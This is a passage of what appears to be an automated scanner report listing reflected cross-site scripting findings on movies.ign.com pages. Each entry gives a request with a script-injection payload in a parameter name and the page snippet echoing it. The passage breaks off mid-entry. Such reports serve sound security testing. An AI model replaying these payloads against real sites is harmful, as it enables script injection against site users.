<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1147900p1.html?d8b7e"-alert(1)-"aeb1de63632=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.283. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1147900p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3fd"><script>alert(1)</script>4dd25e866bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147900p1.html?cb3fd"><script>alert(1)</script>4dd25e866bd=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.284. http://movies.ign.com/articles/114/1147929p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1147929p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d51f"><script>alert(1)</script>e164fe99c48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147929p1.html?6d51f"><script>alert(1)</script>e164fe99c48=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.285. http://movies.ign.com/articles/114/1147929p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1147929p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"6f3354e8262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147929p1.html?62888"-alert(1)-"6f3354e8262=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1147929p1.html?62888"-alert(1)-"6f3354e8262=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.286. http://movies.ign.com/articles/114/1148092c.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148092c.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29c13"-alert(1)-"26508b83d99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1148092c.html?29c13"-alert(1)-"26508b83d99=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... coreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1148092c.html?29c13"-alert(1)-"26508b83d99=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.287. http://movies.ign.com/articles/114/1148092c.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148092c.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5317"><script>alert(1)</script>9daa5138b67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1148092c.html?d5317"><script>alert(1)</script>9daa5138b67=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.288. http://movies.ign.com/articles/114/1148092p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148092p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47bc4"-alert(1)-"d283fb4d63c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1148092p1.html?47bc4"-alert(1)-"d283fb4d63c=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1148092p1.html?47bc4"-alert(1)-"d283fb4d63c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.289. http://movies.ign.com/articles/114/1148092p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148092p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af31d"><script>alert(1)</script>185f3e74ce3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1148092p1.html?af31d"><script>alert(1)</script>185f3e74ce3=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.290. http://movies.ign.com/articles/114/1148108p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148108p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae1e"><script>alert(1)</script>141c2aea464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1148108p1.html?4ae1e"><script>alert(1)</script>141c2aea464=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.291. http://movies.ign.com/articles/114/1148108p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148108p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b5f6"-alert(1)-"a44d596b8da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1148108p1.html?2b5f6"-alert(1)-"a44d596b8da=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1148108p1.html?2b5f6"-alert(1)-"a44d596b8da=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.292. http://movies.ign.com/articles/114/1148114p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148114p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 763c5"><script>alert(1)</script>2c358e183ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1148114p1.html?763c5"><script>alert(1)</script>2c358e183ba=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.293. http://movies.ign.com/articles/114/1148114p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148114p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ee44"-alert(1)-"959923d1a63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1148114p1.html?3ee44"-alert(1)-"959923d1a63=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1148114p1.html?3ee44"-alert(1)-"959923d1a63=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.294. http://movies.ign.com/articles/114/1148115p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148115p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8c4"><script>alert(1)</script>0d69c01d8b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1148115p1.html?1a8c4"><script>alert(1)</script>0d69c01d8b4=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.295. http://movies.ign.com/articles/114/1148115p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1148115p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be631"-alert(1)-"5da2ff87b32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1148115p1.html?be631"-alert(1)-"5da2ff87b32=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1148115p1.html?be631"-alert(1)-"5da2ff87b32=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.296. http://movies.ign.com/gamestofilm.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/gamestofilm.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8803"><script>alert(1)</script>754ee5a6a93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gamestofilm.html?b8803"><script>alert(1)</script>754ee5a6a93=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://movies.ign.com/gamestofilm.html?b8803"><script>alert(1)</script>754ee5a6a93=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.297. http://movies.ign.com/gamestofilm.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/gamestofilm.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34740"-alert(1)-"7a618f6707d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gamestofilm.html?34740"-alert(1)-"7a618f6707d=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/gamestofilm.html?34740"-alert(1)-"7a618f6707d=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.298. http://movies.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55374"><script>alert(1)</script>97d976b725a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?55374"><script>alert(1)</script>97d976b725a=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://movies.ign.com/index/latest-updates.html?55374"><script>alert(1)</script>97d976b725a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.299. http://movies.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8c73"-alert(1)-"0e0342e390f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?c8c73"-alert(1)-"0e0342e390f=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... scoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/latest-updates.html?c8c73"-alert(1)-"0e0342e390f=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.300. http://movies.ign.com/index/movies.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/movies.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbefb"><script>alert(1)</script>19d76564c0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/movies.html?bbefb"><script>alert(1)</script>19d76564c0f=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.301. http://movies.ign.com/index/movies.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/movies.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86c3f"-alert(1)-"5709b2b37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/movies.html?86c3f"-alert(1)-"5709b2b37=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... eof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/movies.html?86c3f"-alert(1)-"5709b2b37=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.302. http://movies.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eaa0"-alert(1)-"6ea7bf720eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/news.html?7eaa0"-alert(1)-"6ea7bf720eb=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/news.html?7eaa0"-alert(1)-"6ea7bf720eb=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.303. http://movies.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ad0d"><script>alert(1)</script>16c2c14d64b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/news.html?1ad0d"><script>alert(1)</script>16c2c14d64b=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.304. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/podcasts.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf48"><script>alert(1)</script>504a964df37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/podcasts.html?daf48"><script>alert(1)</script>504a964df37=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.305. http://movies.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/podcasts.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5162"-alert(1)-"22f7d705fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/podcasts.html?f5162"-alert(1)-"22f7d705fc5=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/podcasts.html?f5162"-alert(1)-"22f7d705fc5=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.306. http://movies.ign.com/index/release.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/release.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb4a5"-alert(1)-"aeab18a9641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/release.html?cb4a5"-alert(1)-"aeab18a9641=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... of _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/release.html?cb4a5"-alert(1)-"aeab18a9641=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.307. http://movies.ign.com/index/release.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/release.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b01"><script>alert(1)</script>e6ed93b1c6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/release.html?a7b01"><script>alert(1)</script>e6ed93b1c6b=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.308. http://movies.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaa3b"-alert(1)-"bccaf497d1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?eaa3b"-alert(1)-"bccaf497d1e=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... of _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/index/reviews.html?eaa3b"-alert(1)-"bccaf497d1e=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.309. http://movies.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/index/reviews.html
Issue detail
